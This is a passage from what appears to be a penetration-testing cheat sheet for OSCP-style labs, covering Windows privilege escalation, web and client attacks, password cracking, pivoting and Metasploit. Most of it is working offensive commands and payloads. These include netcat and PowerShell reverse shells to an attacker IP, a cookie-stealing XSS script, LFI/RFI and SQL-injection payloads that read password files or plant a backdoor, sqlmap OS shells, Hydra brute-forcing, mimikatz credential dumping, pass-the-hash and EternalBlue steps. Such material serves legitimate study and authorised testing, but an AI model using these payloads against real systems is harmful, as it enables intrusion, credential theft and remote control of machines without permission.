server to our Kali box using netcat for Windows and Runas.exe:\n\n C:\\>C:\\Windows\\System32\\runas.exe /env /noprofile /user:Test \"c:\\users\\public\\nc.exe -nc 192.168.1.10 4444 -e cmd.exe\"\n Enter the password for Test:\n Attempting to start nc.exe as user \"COMPUTERNAME\\Test\" ...\n\n - PowerShell can also be used to launch a process as another user. The following simple powershell script will run a reverse shell as the specified username and password.\n\n $username = ''\n $password = ''\n $securePassword = ConvertTo-SecureString $password -AsPlainText -Force\n $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword\n Start-Process -FilePath C:\\Users\\Public\\nc.exe -NoNewWindow -Credential $credential -ArgumentList (\"-nc\",\"192.168.1.10\",\"4444\",\"-e\",\"cmd.exe\") -WorkingDirectory C:\\Users\\Public\n\n Next run this script using powershell.exe:\n\n `powershell -ExecutionPolicy ByPass -command \"& { . C:\\Users\\public\\PowerShellRunAs.ps1; }\"`\n\n\n- Windows Service Configuration Viewer - Check for misconfigurations\n in services that can lead to privilege escalation. You can replace\n the executable with your own and have windows execute whatever code\n you want as the privileged user. \n icacls scsiaccess.exe\n\n scsiaccess.exe \n NT AUTHORITY\\SYSTEM:(I)(F) \n BUILTIN\\Administrators:(I)(F) \n BUILTIN\\Users:(I)(RX) \n APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX) \n Everyone:(I)(F)\n\n- Compile a custom add user command in windows using C \n\n ```\n root@kali:~# cat useradd.c \n #include /* system, NULL, EXIT_FAILURE */ \n int main () \n { \n int i; \n i=system (\"net localgroup administrators low /add\"); \n return 0; \n }\n ``` \n\n `i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c`\n\n- Group Policy Preferences (GPP) \n A common useful misconfiguration found in modern domain environments\n is unprotected Windows GPP settings files\n\n - map the Domain controller SYSVOL share \n \n `net use z:\\\\dc01\\SYSVOL`\n\n - Find the GPP file: Groups.xml \n \n `dir /s Groups.xml`\n\n - Review the contents for passwords \n \n `type Groups.xml`\n\n - Decrypt using GPP Decrypt \n \n `gpp-decrypt riBZpPtHOGtVk+SdLOmJ6xiNgFH6Gp45BoP3I6AnPgZ1IfxtgI67qqZfgh78kBZB`\n \n- Find and display the proof.txt or flag.txt - get the loot!\n \n `#meterpreter > run post/windows/gather/win_privs`\n `cd\\ & dir /b /s proof.txt`\n `type c:\\pathto\\proof.txt`\n \n\nClient, Web and Password Attacks\n==============================================================================================================================\n\n- Client Attacks\n ------------------------------------------------------------------------------------------------------------\n\n - MS12-037- Internet Explorer 8 Fixed Col Span ID \n wget -O exploit.html\n \n service apache2 start\n\n - JAVA Signed Jar client side attack \n echo '' >\n /var/www/html/java.html \n User must hit run on the popup that occurs.\n\n - Linux Client Shells \n [*http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/*](http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/)\n\n - Setting up the Client Side Exploit\n\n - Swapping Out the Shellcode\n\n - Injecting a Backdoor Shell into Plink.exe \n backdoor-factory -f /usr/share/windows-binaries/plink.exe -H $ip \n -P 4444 -s reverse\\_shell\\_tcp\n\n- Web Attacks\n ---------------------------------------------------------------------------------------------------------\n\n - Web Shag Web Application Vulnerability Assessment Platform \n webshag-gui\n\n - Web Shells \n [*http://tools.kali.org/maintaining-access/webshells*](http://tools.kali.org/maintaining-access/webshells) \n `ls -l /usr/share/webshells/`\n\n - Generate a PHP backdoor (generate) protected with the given\n password (s3cr3t) \n weevely generate s3cr3t \n weevely http://$ip/weevely.php s3cr3t\n\n - Java Signed Applet Attack\n\n - HTTP / HTTPS Webserver Enumeration\n\n - OWASP Dirbuster\n\n - nikto -h $ip\n\n - Essential Iceweasel Add-ons \n Cookies Manager\n https://addons.mozilla.org/en-US/firefox/addon/cookies-manager-plus/ \n Tamper Data \n https://addons.mozilla.org/en-US/firefox/addon/tamper-data/\n\n - Cross Site Scripting (XSS) \n significant impacts, such as cookie stealing and authentication\n bypass, redirecting the victim’s browser to a malicious HTML\n page, and more\n\n - Browser Redirection and IFRAME Injection\n ```html\n \n ```\n\n - Stealing Cookies and Session Information\n ```javascript\n \n new image().src=\"http://$ip/bogus.php?output=\"+document.cookie; \n \n ```\n nc -nlvp 80\n\n- File Inclusion Vulnerabilities \n -----------------------------------------------------------------------------------------------------------------------------\n\n - Local (LFI) and remote (RFI) file inclusion vulnerabilities are\n commonly found in poorly written PHP code.\n\n - fimap - There is a Python tool called fimap which can be\n leveraged to automate the exploitation of LFI/RFI\n vulnerabilities that are found in PHP (sqlmap for LFI): \n [*https://github.com/kurobeats/fimap*](https://github.com/kurobeats/fimap)\n\n - Gaining a shell from phpinfo() \n fimap + phpinfo() Exploit - If a phpinfo() file is present,\n it’s usually possible to get a shell, if you don’t know the\n location of the phpinfo file fimap can probe for it, or you\n could use a tool like OWASP DirBuster.\n\n - For Local File Inclusions look for the include() function in PHP\n code.\n ```php \n include(\"lang/\".$_COOKIE['lang']); \n include($_GET['page'].\".php\");\n ```\n\n - LFI - Encode and Decode a file using base64 \n ```bash\n curl -s \\\n \"http://$ip/?page=php://filter/convert.base64-encode/resource=index\" \\\n | grep -e '\\[^\\\\ \\]\\\\{40,\\\\}' | base64 -d\n ```\n\n - LFI - Download file with base 64 encoding \n [*http://$ip/index.php?page=php://filter/convert.base64-encode/resource=admin.php*](about:blank)\n\n - LFI Linux Files: \n /etc/issue \n /proc/version \n /etc/profile \n /etc/passwd \n /etc/passwd \n /etc/shadow \n /root/.bash\\_history \n /var/log/dmessage \n /var/mail/root \n /var/spool/cron/crontabs/root\n\n - LFI Windows Files: \n %SYSTEMROOT%\\\\repair\\\\system \n %SYSTEMROOT%\\\\repair\\\\SAM \n %SYSTEMROOT%\\\\repair\\\\SAM \n %WINDIR%\\\\win.ini \n %SYSTEMDRIVE%\\\\boot.ini \n %WINDIR%\\\\Panther\\\\sysprep.inf \n %WINDIR%\\\\system32\\\\config\\\\AppEvent.Evt\n\n - LFI OSX Files: \n /etc/fstab \n /etc/master.passwd \n /etc/resolv.conf \n /etc/sudoers \n /etc/sysctl.conf\n\n - LFI - Download passwords file \n [*http://$ip/index.php?page=/etc/passwd*](about:blank) \n [*http://$ip/index.php?file=../../../../etc/passwd*](about:blank)\n\n - LFI - Download passwords file with filter evasion \n [*http://$ip/index.php?file=..%2F..%2F..%2F..%2Fetc%2Fpasswd*](about:blank)\n\n - Local File Inclusion - In versions of PHP below 5.3 we can\n terminate with null byte \n GET\n /addguestbook.php?name=Haxor&comment=Merci!&LANG=../../../../../../../windows/system32/drivers/etc/hosts%00\n\n - Contaminating Log Files ``\n\n - For a Remote File Inclusion look for php code that is not sanitized and passed to the PHP include function and the php.ini\n file must be configured to allow remote files\n \n */etc/php5/cgi/php.ini* - \"allow_url_fopen\" and \"allow_url_include\" both set to \"on\" \n \n `include($_REQUEST[\"file\"].\".php\");`\n\n - Remote File Inclusion \n \n `http://192.168.11.35/addguestbook.php?name=a&comment=b&LANG=http://192.168.10.5/evil.txt `\n \n ``\n\n- Database Vulnerabilities\n ----------------------------------------------------------------------------------------------------------------------\n\n - Playing with SQL Syntax\n A great tool I have found for playing with SQL Syntax for a variety of database types (MSSQL Server, MySql, PostGreSql, Oracle) is SQL Fiddle:\n \n http://sqlfiddle.com\n \n Another site is rextester.com:\n \n http://rextester.com/l/mysql_online_compiler\n \n - Detecting SQL Injection Vulnerabilities. \n \n Most modern automated scanner tools use time delay techniques to detect SQL injection vulnerabilities. This method can tell you if a SQL injection vulnerability is present even if it is a \"blind\" sql injection vulnerabilit that does not provide any data back. You know your SQL injection is working when the server takes a LOooooong time to respond. I have added a line comment at the end of each injection statement just in case there is additional SQL code after the injection point.\n \n \n - **MSSQL Server SQL Injection Time Delay Detection:**\n Add a 30 second delay to a MSSQL Server Query\n \n - *Original Query*\n \n `SELECT * FROM products WHERE name='Test';`\n\n - *Injection Value*\n \n `'; WAITFOR DELAY '00:00:30'; --`\n\n - *Resulting Query*\n \n `SELECT * FROM products WHERE name='Test'; WAITFOR DELAY '00:00:30'; --`\n\n - **MySQL Injection Time Delay Detection:**\n Add a 30 second delay to a MySQL Query\n \n - *Original Query*\n \n `SELECT * FROM products WHERE name='Test';`\n\n - *Injection Value*\n \n `'-SLEEP(30); #`\n\n - *Resulting Query*\n \n `SELECT * FROM products WHERE name='Test'-SLEEP(30); #`\n\n\n - **PostGreSQL Injection Time Delay Detection:**\n Add a 30 second delay to an PostGreSQL Query\n \n - *Original Query*\n \n `SELECT * FROM products WHERE name='Test';`\n\n - *Injection Value*\n \n `'; SELECT pg_sleep(30); --`\n\n - *Resulting Query*\n \n `SELECT * FROM products WHERE name='Test'; SELECT pg_sleep(30); --`\n\n - Grab password hashes from a web application mysql database called “Users” - once you have the MySQL root username and password \n \n mysql -u root -p -h $ip\n use \"Users\" \n show tables; \n select \\* from users;\n\n - Authentication Bypass \n \n name='wronguser' or 1=1; \n name='wronguser' or 1=1 LIMIT 1;\n\n - Enumerating the Database \n \n `http://192.168.11.35/comment.php?id=738)'` \n \n Verbose error message? \n \n `http://$ip/comment.php?id=738 order by 1`\n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,5,6 `\n \n Determine MySQL Version: \n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,@@version,6 `\n \n Current user being used for the database connection:\n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,user(),6 `\n \n Enumerate database tables and column structures \n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,table_name,6 FROM information_schema.tables `\n \n Target the users table in the database \n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='users' `\n \n Extract the name and password \n \n `http://$ip/comment.php?id=738 union select 1,2,3,4,concat(name,0x3a, password),6 FROM users ` \n \n Create a backdoor\n \n `http://$ip/comment.php?id=738 union all select 1,2,3,4,\"\",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'`\n \n\n - **SQLMap Examples**\n\n - Crawl the links\n \n `sqlmap -u http://$ip --crawl=1`\n \n `sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3`\n \n \n - SQLMap Search for databases against a suspected GET SQL Injection \n \n `sqlmap –u http://$ip/blog/index.php?search –dbs`\n\n - SQLMap dump tables from database oscommerce at GET SQL injection\n \n `sqlmap –u http://$ip/blog/index.php?search= –dbs –D oscommerce –tables –dumps `\n \n - SQLMap GET Parameter command \n \n `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --dump -threads=5 `\n \n - SQLMap Post Username parameter\n \n `sqlmap -u http://$ip/login.php --method=POST --data=\"usermail=asc@dsd.com&password=1231\" -p \"usermail\" --risk=3 --level=5 --dbms=MySQL --dump-all`\n \n - SQL Map OS Shell\n \n `sqlmap -u http://$ip/comment.php?id=738 --dbms=mysql --osshell `\n \n `sqlmap -u http://$ip/login.php --method=POST --data=\"usermail=asc@dsd.com&password=1231\" -p \"usermail\" --risk=3 --level=5 --dbms=MySQL --os-shell`\n \n - Automated sqlmap scan\n \n `sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read=\"/var/www/blah.php\"`\n \n - Targeted sqlmap scan\n \n `sqlmap -u \"http://meh.com/meh.php?id=1\" --dbms=mysql --tech=U --random-agent --dump`\n \n - Scan url for union + error based injection with mysql backend and use a random user agent + database dump \n \n `sqlmap -o -u http://$ip/index.php --forms --dbs `\n \n `sqlmap -o -u \"http://$ip/form/\" --forms`\n \n - Sqlmap check form for injection \n \n `sqlmap -o -u \"http://$ip/vuln-form\" --forms -D database-name -T users --dump`\n \n - Enumerate databases \n \n `sqlmap --dbms=mysql -u \"$URL\" --dbs`\n \n - Enumerate tables from a specific database \n \n `sqlmap --dbms=mysql -u \"$URL\" -D \"$DATABASE\" --tables `\n \n - Dump table data from a specific database and table \n \n `sqlmap --dbms=mysql -u \"$URL\" -D \"$DATABASE\" -T \"$TABLE\" --dump `\n \n - Specify parameter to exploit \n \n `sqlmap --dbms=mysql -u \"http://www.example.com/param1=value1&param2=value2\" --dbs -p param2 `\n \n - Specify parameter to exploit in 'nice' URIs (exploits param1)\n \n `sqlmap --dbms=mysql -u \"http://www.example.com/param1/value1*/param2/value2\" --dbs `\n \n - Get OS shell \n \n `sqlmap --dbms=mysql -u \"$URL\" --os-shell`\n \n - Get SQL shell \n \n `sqlmap --dbms=mysql -u \"$URL\" --sql-shell`\n \n - SQL query \n \n `sqlmap --dbms=mysql -u \"$URL\" -D \"$DATABASE\" --sql-query \"SELECT * FROM $TABLE;\"` \n \n - Use Tor Socks5 proxy \n \n `sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u \"$URL\" --dbs`\n \n \n- **NoSQLMap Examples**\n You may encounter NoSQL instances like MongoDB in your OSCP journies (`/cgi-bin/mongo/2.2.3/dbparse.py`). NoSQLMap can help you to automate NoSQLDatabase enumeration. \n \n - NoSQLMap Installation \n \n ```bash\n git clone https://github.com/codingo/NoSQLMap.git\n cd NoSQLMap/\n ls\n pip install couchdb\n pip install pbkdf2\n pip install ipcalc\n python nosqlmap.py\n ```\n\n\n - Often you can create an exception dump message with MongoDB using a malformed NoSQLQuery such as:\n \n `a'; return this.a != 'BadData’'; var dummy='!`\n \n \n\n- Password Attacks\n --------------------------------------------------------------------------------------------------------------\n\n - AES Decryption \n http://aesencryption.net/\n\n - Convert multiple webpages into a word list\n ```bash\n for x in 'index' 'about' 'post' 'contact' ; do \\\n curl http://$ip/$x.html | html2markdown | tr -s ' ' '\\\\n' >> webapp.txt ; \\\n done\n ```\n\n - Or convert html to word list dict \n `html2dic index.html.out | sort -u > index-html.dict`\n\n - Default Usernames and Passwords\n\n - CIRT \n [*http://www.cirt.net/passwords*](http://www.cirt.net/passwords)\n\n - Government Security - Default Logins and Passwords for\n Networked Devices\n\n - [*http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php*](http://www.governmentsecurity.org/articles/DefaultLoginsandPasswordsforNetworkedDevices.php)\n\n - Virus.org \n [*http://www.virus.org/default-password/*](http://www.virus.org/default-password/)\n\n - Default Password \n [*http://www.defaultpassword.com/*](http://www.defaultpassword.com/)\n\n - Brute Force\n\n - Nmap Brute forcing Scripts \n [*https://nmap.org/nsedoc/categories/brute.html*](https://nmap.org/nsedoc/categories/brute.html)\n\n - Nmap Generic auto detect brute force attack:\n `nmap --script brute -Pn `\n\n - MySQL nmap brute force attack:\n `nmap --script=mysql-brute $ip`\n\n - Dictionary Files\n\n - Word lists on Kali \n `cd /usr/share/wordlists`\n\n - Key-space Brute Force\n\n - `crunch 6 6 0123456789ABCDEF -o crunch1.txt`\n\n - `crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha`\n\n - `crunch 8 8 -t ,@@^^%%%`\n\n - Pwdump and Fgdump - Security Accounts Manager (SAM)\n\n - `pwdump.exe` - attempts to extract password hashes\n\n - `fgdump.exe` - attempts to kill local antiviruses before\n attempting to dump the password hashes and\n cached credentials.\n\n - Windows Credential Editor (WCE)\n\n - allows one to perform several attacks to obtain clear text\n passwords and hashes. Usage: `wce -w`\n\n - Mimikatz\n\n - extract plaintexts passwords, hash, PIN code and kerberos\n tickets from memory. mimikatz can also perform\n pass-the-hash, pass-the-ticket or build Golden tickets \n [*https://github.com/gentilkiwi/mimikatz*](https://github.com/gentilkiwi/mimikatz)\n From metasploit meterpreter (must have System level access):\n ```\n meterpreter> load mimikatz\n meterpreter> help mimikatz\n meterpreter> msv\n meterpreter> kerberos\n meterpreter> mimikatz_command -f samdump::hashes\n meterpreter> mimikatz_command -f sekurlsa::searchPasswords\n ```\n\n - Password Profiling\n\n - cewl can generate a password list from a web page \n `cewl www.megacorpone.com -m 6 -w megacorp-cewl.txt`\n\n - Password Mutating\n\n - John the ripper can mutate password lists \n nano /etc/john/john.conf \n `john --wordlist=megacorp-cewl.txt --rules --stdout > mutated.txt`\n\n - Medusa\n\n - Medusa, initiated against an htaccess protected web\n directory \n `medusa -h $ip -u admin -P password-file.txt -M http -m DIR:/admin -T 10`\n\n - Ncrack\n\n - ncrack (from the makers of nmap) can brute force RDP \n `ncrack -vv --user offsec -P password-file.txt rdp://$ip`\n\n - Hydra\n\n - Hydra brute force against SNMP \n \n `hydra -P password-file.txt -v $ip snmp`\n\n - Hydra FTP known user and rockyou password list \n \n `hydra -t 1 -l admin -P /usr/share/wordlists/rockyou.txt -vV $ip ftp`\n\n - Hydra SSH using list of users and passwords \n \n `hydra -v -V -u -L users.txt -P passwords.txt -t 1 -u $ip ssh`\n\n - Hydra SSH using a known password and a username list \n \n `hydra -v -V -u -L users.txt -p \"\" -t 1 -u $ip ssh`\n\n - Hydra SSH Against Known username on port 22\n \n `hydra $ip -s 22 ssh -l -P big_wordlist.txt`\n\n - Hydra POP3 Brute Force \n \n `hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f $ip pop3 -V`\n\n - Hydra SMTP Brute Force \n \n `hydra -P /usr/share/wordlistsnmap.lst $ip smtp -V`\n\n - Hydra attack http get 401 login with a dictionary \n \n `hydra -L ./webapp.txt -P ./webapp.txt $ip http-get /admin`\n \n - Hydra attack Windows Remote Desktop with rockyou\n \n `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://$ip`\n \n - Hydra brute force SMB user with rockyou:\n \n `hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb`\n \n - Hydra brute force a Wordpress admin login\n \n `hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'`\n\n \n\n- Password Hash Attacks\n -------------------------------------------------------------------------------------------------------------------\n\n - Online Password Cracking \n [*https://crackstation.net/*](https://crackstation.net/)\n [*http://finder.insidepro.com/*](http://finder.insidepro.com/)\n\n - Hashcat\n Needed to install new drivers to get my GPU Cracking to work on the Kali linux VM and I also had to use the --force parameter.\n\n `apt-get install libhwloc-dev ocl-icd-dev ocl-icd-opencl-dev`\n\n and\n\n `apt-get install pocl-opencl-icd`\n\n\n Cracking Linux Hashes - /etc/shadow file\n ```\n 500 | md5crypt $1$, MD5(Unix) | Operating-Systems\n 3200 | bcrypt $2*$, Blowfish(Unix) | Operating-Systems\n 7400 | sha256crypt $5$, SHA256(Unix) | Operating-Systems\n 1800 | sha512crypt $6$, SHA512(Unix) | Operating-Systems\n ```\n Cracking Windows Hashes\n ```\n 3000 | LM | Operating-Systems\n 1000 | NTLM | Operating-Systems\n ```\n Cracking Common Application Hashes\n ```\n 900 | MD4 | Raw Hash\n 0 | MD5 | Raw Hash\n 5100 | Half MD5 | Raw Hash\n 100 | SHA1 | Raw Hash\n 10800 | SHA-384 | Raw Hash\n 1400 | SHA-256 | Raw Hash\n 1700 | SHA-512 | Raw Hash\n ```\n\n Create a .hash file with all the hashes you want to crack\n puthasheshere.hash:\n `$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/`\n \n Hashcat example cracking Linux md5crypt passwords $1$ using rockyou:\n \n `hashcat --force -m 500 -a 0 -o found1.txt --remove puthasheshere.hash /usr/share/wordlists/rockyou.txt`\n \n Wordpress sample hash: `$P$B55D6LjfHDkINU5wF.v2BuuzO0/XPk/`\n \n Wordpress clear text: `test`\n \n Hashcat example cracking Wordpress passwords using rockyou:\n \n `hashcat --force -m 400 -a 0 -o found1.txt --remove wphash.hash /usr/share/wordlists/rockyou.txt`\n\n - Sample Hashes \n [*http://openwall.info/wiki/john/sample-hashes*](http://openwall.info/wiki/john/sample-hashes)\n\n - Identify Hashes \n \n `hash-identifier`\n\n - To crack linux hashes you must first unshadow them: \n \n `unshadow passwd-file.txt shadow-file.txt`\n\n `unshadow passwd-file.txt shadow-file.txt > unshadowed.txt`\n\n- John the Ripper - Password Hash Cracking\n\n - `john $ip.pwdump`\n\n - `john --wordlist=/usr/share/wordlists/rockyou.txt hashes`\n\n - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt`\n\n - `john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt`\n\n - JTR forced descrypt cracking with wordlist \n \n `john --format=descrypt --wordlist /usr/share/wordlists/rockyou.txt hash.txt`\n\n - JTR forced descrypt brute force cracking \n \n `john --format=descrypt hash --show`\n\n- Passing the Hash in Windows\n\n - Use Metasploit to exploit one of the SMB servers in the labs.\n Dump the password hashes and attempt a pass-the-hash attack\n against another system: \n \n `export SMBHASH=aad3b435b51404eeaad3b435b51404ee:6F403D3166024568403A94C3A6561896 `\n \n `pth-winexe -U administrator //$ip cmd`\n\nNetworking, Pivoting and Tunneling\n================================================================================================================================\n\n- Port Forwarding - accept traffic on a given IP address and port and\n redirect it to a different IP address and port\n\n - `apt-get install rinetd`\n\n - `cat /etc/rinetd.conf`\n\n ```\n # bindadress bindport connectaddress connectport\n w.x.y.z 53 a.b.c.d 80\n ```\n\n- SSH Local Port Forwarding: supports bi-directional communication\n channels\n\n - `ssh -L ::`\n\n- SSH Remote Port Forwarding: Suitable for popping a remote shell on\n an internal non routable network\n\n - `ssh -R ::` \n\n- SSH Dynamic Port Forwarding: create a SOCKS4 proxy on our local\n attacking box to tunnel ALL incoming traffic to ANY host in the DMZ\n network on ANY PORT\n\n - `ssh -D -p `\n\n- Proxychains - Perform nmap scan within a DMZ from an external\n computer\n\n - Create reverse SSH tunnel from Popped machine on :2222 \n \n `ssh -f -N -T -R22222:localhost:22 yourpublichost.example.com`\n `ssh -f -N -R 2222::22 root@`\n\n - Create a Dynamic application-level port forward on 8080 thru\n 2222 \n \n `ssh -f -N -D :8080 -p 2222 hax0r@`\n\n - Leverage the SSH SOCKS server to perform Nmap scan on network\n using proxy chains \n \n `proxychains nmap --top-ports=20 -sT -Pn $ip/24`\n\n- HTTP Tunneling \n \n `nc -vvn $ip 8888`\n\n- Traffic Encapsulation - Bypassing deep packet inspection\n\n - http tunnel \n On server side: \n `sudo hts -F : 80 `\n On client side: \n `sudo htc -P -F :80 stunnel`\n\n- Tunnel Remote Desktop (RDP) from a Popped Windows machine to your\n network\n\n - Tunnel on port 22 \n \n `plink -l root -pw pass -R 3389::3389 `\n\n - Port 22 blocked? Try port 80? or 443? \n \n `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P80`\n\n- Tunnel Remote Desktop (RDP) from a Popped Windows using HTTP Tunnel\n (bypass deep packet inspection)\n\n - Windows machine add required firewall rules without prompting the user\n\n - `netsh advfirewall firewall add rule name=\"httptunnel_client\" dir=in action=allow program=\"httptunnel_client.exe\" enable=yes`\n\n - `netsh advfirewall firewall add rule name=\"3000\" dir=in action=allow protocol=TCP localport=3000`\n\n - `netsh advfirewall firewall add rule name=\"1080\" dir=in action=allow protocol=TCP localport=1080`\n\n - `netsh advfirewall firewall add rule name=\"1079\" dir=in action=allow protocol=TCP localport=1079`\n\n - Start the http tunnel client \n \n `httptunnel_client.exe`\n\n - Create HTTP reverse shell by connecting to localhost port 3000 \n \n `plink -l root -pw 23847sd98sdf987sf98732 -R 3389::3389 -P 3000`\n\n- VLAN Hopping\n\n - ```bash\n git clone https://github.com/nccgroup/vlan-hopping.git \n chmod 700 frogger.sh \n ./frogger.sh\n ```\n \n\n- VPN Hacking\n\n - Identify VPN servers: \n `./udp-protocol-scanner.pl -p ike $ip`\n\n - Scan a range for VPN servers: \n `./udp-protocol-scanner.pl -p ike -f ip.txt`\n\n - Use IKEForce to enumerate or dictionary attack VPN servers: \n \n `pip install pyip` \n \n `git clone https://github.com/SpiderLabs/ikeforce.git `\n \n Perform IKE VPN enumeration with IKEForce: \n \n `./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic `\n \n Bruteforce IKE VPN using IKEForce: \n \n `./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1 `\n Use ike-scan to capture the PSK hash: \n \n ```bash\n ike-scan \n ike-scan TARGET-IP \n ike-scan -A TARGET-IP \n ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key \n ike-scan –M –A –n example\\_group -P hash-file.txt TARGET-IP\n ```\n Use psk-crack to crack the PSK hash \n \n ```bash\n psk-crack hash-file.txt \n pskcrack \n psk-crack -b 5 TARGET-IPkey \n psk-crack -b 5 --charset=\"01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\" 192-168-207-134key \n psk-crack -d /path/to/dictionary-file TARGET-IP-key\n ```\n\n- PPTP Hacking\n\n - Identifying PPTP, it listens on TCP: 1723 \n NMAP PPTP Fingerprint: \n \n `nmap –Pn -sV -p 1723 TARGET(S) `\n PPTP Dictionary Attack \n \n `thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst`\n\n- Port Forwarding/Redirection\n\n- PuTTY Link tunnel - SSH Tunneling\n\n - Forward remote port to local address: \n \n `plink.exe -P 22 -l root -pw \"1337\" -R 445::445 `\n\n- SSH Pivoting\n\n - SSH pivoting from one network to another: \n \n `ssh -D :1010 -p 22 user@`\n\n- DNS Tunneling\n\n - dnscat2 supports “download” and “upload” commands for getting iles (data and programs) to and from the target machine.\n\n - Attacking Machine Installation: \n \n ```bash\n apt-get update \n apt-get -y install ruby-dev git make g++ \n gem install bundler \n git clone https://github.com/iagox86/dnscat2.git \n cd dnscat2/server \n bundle install\n ```\n\n - Run dnscat2: \n \n ```\n ruby ./dnscat2.rb \n dnscat2> New session established: 1422 \n dnscat2> session -i 1422\n ```\n\n - Target Machine: \n [*https://downloads.skullsecurity.org/dnscat2/*](https://downloads.skullsecurity.org/dnscat2/)\n\n [*https://github.com/lukebaggett/dnscat2-powershell/*](https://github.com/lukebaggett/dnscat2-powershell/)\n\n `dnscat --host `\n\nThe Metasploit Framework\n======================================================================================================================\n\n- See [*Metasploit Unleashed\n Course*](https://www.offensive-security.com/metasploit-unleashed/)\n in the Essentials\n\n- Search for exploits using Metasploit GitHub framework source code: \n [*https://github.com/rapid7/metasploit-framework*](https://github.com/rapid7/metasploit-framework) \n Translate them for use on OSCP LAB or EXAM.\n\n- Metasploit\n\n - MetaSploit requires Postfresql \n \n `systemctl start postgresql`\n\n - To enable Postgresql on startup \n \n `systemctl enable postgresql`\n\n- MSF Syntax\n\n - Start metasploit \n \n `msfconsole `\n \n `msfconsole -q`\n\n - Show help for command \n \n `show -h`\n\n - Show Auxiliary modules \n \n `show auxiliary`\n\n - Use a module \n \n ```\n use auxiliary/scanner/snmp/snmp_enum \n use auxiliary/scanner/http/webdav_scanner \n use auxiliary/scanner/smb/smb_version \n use auxiliary/scanner/ftp/ftp_login \n use exploit/windows/pop3/seattlelab_pass\n ```\n\n - Show the basic information for a module \n \n `info`\n\n - Show the configuration parameters for a module \n \n `show options`\n\n - Set options for a module \n \n ```\n set RHOSTS 192.168.1.1-254 \n set THREADS 10\n ```\n\n - Run the module \n \n `run`\n\n - Execute an Exploit \n \n `exploit`\n\n - Search for a module \n \n `search type:auxiliary login`\n\n- Metasploit Database Access\n\n - Show all hosts discovered in the MSF database \n \n `hosts`\n\n - Scan for hosts and store them in the MSF database \n \n `db_nmap`\n\n - Search machines for specific ports in MSF database \n \n `services -p 443`\n\n - Leverage MSF database to scan SMB ports (auto-completed rhosts) \n \n `services -p 443 --rhosts`\n\n- Staged and Non-staged\n\n - Non-staged payload - is a payload that is sent in its entirety in one go\n\n - Staged - sent in two parts Not have enough buffer space Or need to bypass antivirus\n \n- MS 17-010 - EternalBlue\n\n - You may find some boxes that are vulnerable to MS17-010 (AKA. EternalBlue). Although, not offically part of the indended course, this exploit can be leveraged to gain SYSTEM level access to a Windows box. I have never had much luck using the built in Metasploit EternalBlue module. I found that the elevenpaths version works much more relabily. Here are the instructions to install it taken from the following YouTube video: [*https://www.youtube.com/watch?v=4OHLor9VaRI*](https://www.youtube.com/watch?v=4OHLor9VaRI)\n\n\n 1. First step is to configure the Kali to work with wine 32bit\n\n dpkg --add-architecture i386 && apt-get update && apt-get install wine32\n rm -r ~/.wine\n wine cmd.exe\n exit\n\n 2. Download the exploit repostory `https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit`\n\n 3. Move the exploit to `/usr/share/metasploit-framework/modules/exploits/windows/smb` or `~/.msf4/modules/exploits/windows/smb`\n\n 4. Start metasploit console\n \n\n - I found that using spoolsv.exe as the PROCESSINJECT yielded results on OSCP boxes.\n \n ```\n use exploit/windows/smb/eternalblue_doublepulsar\n msf exploit(eternalblue_doublepulsar) > set RHOST 10.10.10.10\n RHOST => 10.10.10.10\n msf exploit(eternalblue_doublepulsar) > set PROCESSINJECT spoolsv.exe\n PROCESSINJECT => spoolsv.exe\n msf exploit(eternalblue_doublepulsar) > run\n ```\n\n\n- Experimenting with Meterpreter\n\n - Get system information from Meterpreter Shell \n \n `sysinfo`\n\n - Get user id from Meterpreter Shell \n \n `getuid`\n\n - Search for a file \n \n `search -f *pass*.txt`\n\n - Upload a file \n \n `upload /usr/share/windows-binaries/nc.exe c:\\\\Users\\\\Offsec`\n\n - Download a file \n \n `download c:\\\\Windows\\\\system32\\\\calc.exe /tmp/calc.exe`\n\n - Invoke a command shell from Meterpreter Shell \n \n `shell`\n\n - Exit the meterpreter shell \n \n `exit`\n\n- Metasploit Exploit Multi Handler\n\n - multi/handler to accept an incoming reverse\\_https\\_meterpreter\n \n ```\n payload \n use exploit/multi/handler \n set PAYLOAD windows/meterpreter/reverse_https \n set LHOST $ip \n set LPORT 443 \n exploit \n [*] Started HTTPS reverse handler on https://$ip:443/\n ```\n\n- Building Your Own MSF Module\n\n - \n ```bash\n mkdir -p ~/.msf4/modules/exploits/linux/misc \n cd ~/.msf4/modules/exploits/linux/misc \n cp 